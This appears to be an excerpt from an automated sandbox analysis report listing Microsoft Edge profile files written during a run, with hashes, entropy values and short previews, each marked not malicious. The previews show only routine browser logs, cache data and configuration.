Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.189296751135215
Encrypted:	false
SSDEEP:	6:H2mVi+q2P923oH+Tcwt8aPrqIFUt8Y2mVAFZZmw+Y2mFcVkwO923oH+Tcwt8amLJ:m+v4YebL3FUt87FZ/+HV5LYebQJ
MD5:	3C245B69ED9AC6A0122FCA7149FE68E5
SHA1:	5F7C923334FE94C01950B7DA249CB2A8CDC36C5E
SHA-256:	7695686EE4FBCA8AE5EC462EEB83EA3F67FA5F0FD83F8EE8048CAE0E9A8B2273
SHA-512:	2BBE6A08E007C0D22E4A85613EB08FCC81302F52568611F6FFAFDCA58DE66E99777F01A933146D645B5A04E27821EB8D00010F1351883A74368FF9D3E07E4A05
Malicious:	false
Preview:	2024/11/09-22:55:13.603 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/09-22:55:13.605 1ddc Recovering log #3.2024/11/09-22:55:13.638 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.189296751135215
Encrypted:	false
SSDEEP:	6:H2mVi+q2P923oH+Tcwt8aPrqIFUt8Y2mVAFZZmw+Y2mFcVkwO923oH+Tcwt8amLJ:m+v4YebL3FUt87FZ/+HV5LYebQJ
MD5:	3C245B69ED9AC6A0122FCA7149FE68E5
SHA1:	5F7C923334FE94C01950B7DA249CB2A8CDC36C5E
SHA-256:	7695686EE4FBCA8AE5EC462EEB83EA3F67FA5F0FD83F8EE8048CAE0E9A8B2273
SHA-512:	2BBE6A08E007C0D22E4A85613EB08FCC81302F52568611F6FFAFDCA58DE66E99777F01A933146D645B5A04E27821EB8D00010F1351883A74368FF9D3E07E4A05
Malicious:	false
Preview:	2024/11/09-22:55:13.603 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/09-22:55:13.605 1ddc Recovering log #3.2024/11/09-22:55:13.638 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.189540454529162
Encrypted:	false
SSDEEP:	6:H2mGFN+q2P923oH+Tcwt865IFUt8Y2mZZmw+Y2mNVkwO923oH+Tcwt86+ULJ:U+v4Yeb/WFUt8M/+MV5LYeb/+SJ
MD5:	147FCCDBC0CC6F83FFA0EF54A3626A28
SHA1:	3B53D22C65FEF57389B347A2C26BE12CABD0AE80
SHA-256:	B14AEA756DE64FF67AF55E63A9E17D5FEAD315896436B70012DDB9C8A75853E3
SHA-512:	46143BEAC45A63DBC5A1E99E950F2649BE4E39C4AB7D558620528961C7B7CB27D66A151B0B897760692FA3890304490CB6CADD76DEEE788BC36B28D44EE5C9E0
Malicious:	false
Preview:	2024/11/09-22:55:13.652 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/09-22:55:13.653 1ddc Recovering log #3.2024/11/09-22:55:13.653 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.189540454529162
Encrypted:	false
SSDEEP:	6:H2mGFN+q2P923oH+Tcwt865IFUt8Y2mZZmw+Y2mNVkwO923oH+Tcwt86+ULJ:U+v4Yeb/WFUt8M/+MV5LYeb/+SJ
MD5:	147FCCDBC0CC6F83FFA0EF54A3626A28
SHA1:	3B53D22C65FEF57389B347A2C26BE12CABD0AE80
SHA-256:	B14AEA756DE64FF67AF55E63A9E17D5FEAD315896436B70012DDB9C8A75853E3
SHA-512:	46143BEAC45A63DBC5A1E99E950F2649BE4E39C4AB7D558620528961C7B7CB27D66A151B0B897760692FA3890304490CB6CADD76DEEE788BC36B28D44EE5C9E0
Malicious:	false
Preview:	2024/11/09-22:55:13.652 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/09-22:55:13.653 1ddc Recovering log #3.2024/11/09-22:55:13.653 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.190234289788915
Encrypted:	false
SSDEEP:	6:H2by+q2P923oH+Tcwt8NIFUt8Y2iwFZZmw+Y2iwFNVkwO923oH+Tcwt8+eLJ:Ay+v4YebpFUt8AwZ/+AwNV5LYebqJ
MD5:	13EF65BA270E25330F05EDFE3F15A731
SHA1:	4F361EE361668ECF2AC6629CBBC781C61B9C789D
SHA-256:	4FC375E148A4E4403ECAF41C9ABFD2982409D4C55CBF074BCB117F648F6FCDBD
SHA-512:	6C2D444C5EE98EA51CF5EEB1B53BCAD3FF269C4170AA58CFFFA899E8FBA7EBB6E480AD72EDB40227C957714486601D6813E78D5CA18257785FC049E19E2AADBC
Malicious:	false
Preview:	2024/11/09-22:55:14.746 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/09-22:55:14.747 1ddc Recovering log #3.2024/11/09-22:55:14.747 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.190234289788915
Encrypted:	false
SSDEEP:	6:H2by+q2P923oH+Tcwt8NIFUt8Y2iwFZZmw+Y2iwFNVkwO923oH+Tcwt8+eLJ:Ay+v4YebpFUt8AwZ/+AwNV5LYebqJ
MD5:	13EF65BA270E25330F05EDFE3F15A731
SHA1:	4F361EE361668ECF2AC6629CBBC781C61B9C789D
SHA-256:	4FC375E148A4E4403ECAF41C9ABFD2982409D4C55CBF074BCB117F648F6FCDBD
SHA-512:	6C2D444C5EE98EA51CF5EEB1B53BCAD3FF269C4170AA58CFFFA899E8FBA7EBB6E480AD72EDB40227C957714486601D6813E78D5CA18257785FC049E19E2AADBC
Malicious:	false
Preview:	2024/11/09-22:55:14.746 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/09-22:55:14.747 1ddc Recovering log #3.2024/11/09-22:55:14.747 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018164538716206493
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEZl4u/:/M/xT02z+
MD5:	BA74B747CAFE8B65A377A83E349AAE2D
SHA1:	2E2A40E6C20B16F4AFD06E7AA3B5B37FCBBC56DD
SHA-256:	567C8D0B64C3DF3AD9E808B4F534D029A64D08D9089EFD0187B021F412E5BA16
SHA-512:	EDBE839FC1767A9C059D897CEC0762C62F8953865360F0A3169FFEEC9885C6CBA3E41E1439CB3BE270619B00A08DCE9D1635DBD75E5140866BEE102881FC6E75
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.21880421027789762
Encrypted:	false
SSDEEP:	3:O7BntFlljq7A/mhWJFuQ3yy7IOWU8lQ/dweytllrE9SFcTp4AGbNCV9RUITn:O7K75fOOQ/d0Xi99pEYl
MD5:	F2D7FE4AF3581BF9056B282A16448A03
SHA1:	7420A95FDA1D5A696576FE1D119D3C3737DEB9AA
SHA-256:	B5D8998C0BEE33BFD20A757DD13EBD667BD3CEA39E9671FDCC1949C5536D446C
SHA-512:	E1F2447F198286BD28E514BE39B821B48E37BDF37283746F50039392BFC3E79964587C08D2761A4A602BE2BA25D6909FD0B478C8BF64363F3CEC5BCB20297D4B
Malicious:	false
Preview:	..............&...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.648077167863425
Encrypted:	false
SSDEEP:	384:aj9P0qQkQerkjlB773pLQP/Kbt1cChCgam6ItRKToaAu:ad5e2mlB7KP/jCv9RKcC
MD5:	7B7A1FFF8B09A61FF9ED2457A4FDF50A
SHA1:	BC9675FB868E7A4C7CB277341F7EB479943A5968
SHA-256:	FA8550FBED22367768F65CB150DC57D513FA75AAED836A8BD3030B3A9BFEB26A
SHA-512:	72929143B0456060868733306E132F9CC69FCCCB69988D36B6CABE93F4BF44D75743738131AA96C5190AB5A8F124157FB4B6361B9B8B5951E4BB245D5E6DE9EC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.270480625233289
Encrypted:	false
SSDEEP:	12:c+v4Yeb8rcHEZrELFUt8oZ/+oNV5LYeb8rcHEZrEZSJ:N4Yeb8nZrExg8oLlLYeb8nZrEZe
MD5:	DC2CBB3CFDAA7EDB4E1477844B52D36B
SHA1:	9B0328E47E757B0D2AA8A6076D43954EA1839D08
SHA-256:	51E98D918ABC2D1F6AF76D11D3BE972572FA043456E9CC9853B203B6C5E97002
SHA-512:	2D7031B61903C1AA1BFC7C48DD8C8602EC6B7F875904ABF857C48987428EDED3DD06F07D8300E8C2FDE4481F0417E56DC5CF05305009E771E32057EAC71EE38B
Malicious:	false
Preview:	2024/11/09-22:55:17.854 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/09-22:55:17.855 1ddc Recovering log #3.2024/11/09-22:55:17.855 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.270480625233289
Encrypted:	false
SSDEEP:	12:c+v4Yeb8rcHEZrELFUt8oZ/+oNV5LYeb8rcHEZrEZSJ:N4Yeb8nZrExg8oLlLYeb8nZrEZe
MD5:	DC2CBB3CFDAA7EDB4E1477844B52D36B
SHA1:	9B0328E47E757B0D2AA8A6076D43954EA1839D08
SHA-256:	51E98D918ABC2D1F6AF76D11D3BE972572FA043456E9CC9853B203B6C5E97002
SHA-512:	2D7031B61903C1AA1BFC7C48DD8C8602EC6B7F875904ABF857C48987428EDED3DD06F07D8300E8C2FDE4481F0417E56DC5CF05305009E771E32057EAC71EE38B
Malicious:	false
Preview:	2024/11/09-22:55:17.854 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/09-22:55:17.855 1ddc Recovering log #3.2024/11/09-22:55:17.855 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1653
Entropy (8bit):	5.670994828258267
Encrypted:	false
SSDEEP:	48:yZdxRLmHPAC1UeUqgrXZbV03Sx4kpy220fGHHHxda2LoEJ:yvxR8AJLvT5JMRxLn
MD5:	91534AC2D990E1F16F4C8D466DB28750
SHA1:	C1F66CFFFBF80013D774CB9675DFDB7819162BD5
SHA-256:	4257ADEACF51A6AE015362C1FA0BD5325FC3149043E728441AE83097A9D105E4
SHA-512:	8832E4F909A338E3F3344F231B1177600D41399669B061867B9CA28247E848D7AF8DA1BEB1287205604F343A15FA482B9880DD3725BC53D7883D987C8699F79E
Malicious:	false
Preview:	EbJ7w................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":447}.!_https://ntp.msn.com..LastKnownPV..1731210922942.-_https://ntp.msn.com..LastVisuallyReadyMarker..1731210924327.._https://ntp.msn.com..MUID!.1C457A5C69C96D7328066F6F68476CEB.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1731210923054,"schedule":[-1,9,0,-1,-1,-1,24],"scheduleFixed":[-1,9,0,-1,-1,-1,24],"simpleSchedule":[14,19,13,35,25,22,28]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1731210922754.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241109.37"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.163869389616599
Encrypted:	false
SSDEEP:	6:H2mof9+q2P923oH+Tcwt8a2jMGIFUt8Y2mSufJZmw+Y2mZE9VkwO923oH+Tcwt8N:el+v4Yeb8EFUt8Y/+tV5LYeb8bJ
MD5:	11E4C15F4D3508BB481F851A863D9D2A
SHA1:	F73250B178BD1EFED2D13DDA3CFEEDE834C7D9C6
SHA-256:	44AF68DFBA32A5A1809EDE1AB2FA057D68E38B8865916425F88C5E7DFEB3D8C5
SHA-512:	4CE2082B0A84B414279347DF45AB9E8570CF39256262FBDF2CE89CAADA6FDC26FA214472DB4B73FCD44CF5EA5949DD9781E86DF5AD59151D5042FB35ADED984C
Malicious:	false
Preview:	2024/11/09-22:55:13.945 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/09-22:55:13.946 1ebc Recovering log #3.2024/11/09-22:55:13.949 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.163869389616599
Encrypted:	false
SSDEEP:	6:H2mof9+q2P923oH+Tcwt8a2jMGIFUt8Y2mSufJZmw+Y2mZE9VkwO923oH+Tcwt8N:el+v4Yeb8EFUt8Y/+tV5LYeb8bJ
MD5:	11E4C15F4D3508BB481F851A863D9D2A
SHA1:	F73250B178BD1EFED2D13DDA3CFEEDE834C7D9C6
SHA-256:	44AF68DFBA32A5A1809EDE1AB2FA057D68E38B8865916425F88C5E7DFEB3D8C5
SHA-512:	4CE2082B0A84B414279347DF45AB9E8570CF39256262FBDF2CE89CAADA6FDC26FA214472DB4B73FCD44CF5EA5949DD9781E86DF5AD59151D5042FB35ADED984C
Malicious:	false
Preview:	2024/11/09-22:55:13.945 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/09-22:55:13.946 1ebc Recovering log #3.2024/11/09-22:55:13.949 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\06f1a377-f509-4c23-8e34-0eefdf3ed9ac.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3eba4fbb-e87f-4a7f-b396-311714e7f022.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\40a5674e-cb4c-4767-b411-21d230ae66ef.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5ba43ebf-feb9-4107-aba1-81dd38d95685.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

